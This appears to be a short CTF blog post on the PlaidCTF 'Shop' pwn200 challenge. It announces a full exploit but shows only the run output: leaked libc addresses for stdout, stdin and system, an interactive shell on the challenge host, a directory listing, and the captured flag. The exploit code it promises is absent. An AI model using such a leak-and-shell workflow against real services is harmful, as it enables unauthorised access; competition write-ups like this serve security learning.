PlaidCTF: Shop (pwn)

Below you find the full exploit for PlaidCTF pwn200 task. The full write up will follow up.

And we run it:

[+] Opening connection to shop.chal.pwning.xxx on port 9916: Done
Stdout is at: 0x7f457d51d620
Stdin is at: 0x7f457d51c8e0
System is at: 0x7f457d19d390
[*] Switching to interactive mode
$ ls -la
total 24
drwxr-xr-x 2 root root  4096 May  5 01:33 .
drwxr-xr-x 5 root root  4096 May  5 01:33 ..
-rw-r----- 1 root shop    37 May  5 01:26 flag.txt
-rwxr-s--- 1 root shop 10520 May  5 01:26 shop
$ pwd
/home/shop
$ cat flag.txt
PCTF{I_w3nt_sh0pp1ng_w1th_D3_8ruj1n}
$ 

Flag: PCTF{I_w3nt_sh0pp1ng_w1th_D3_8ruj1n}

comments powered by Disqus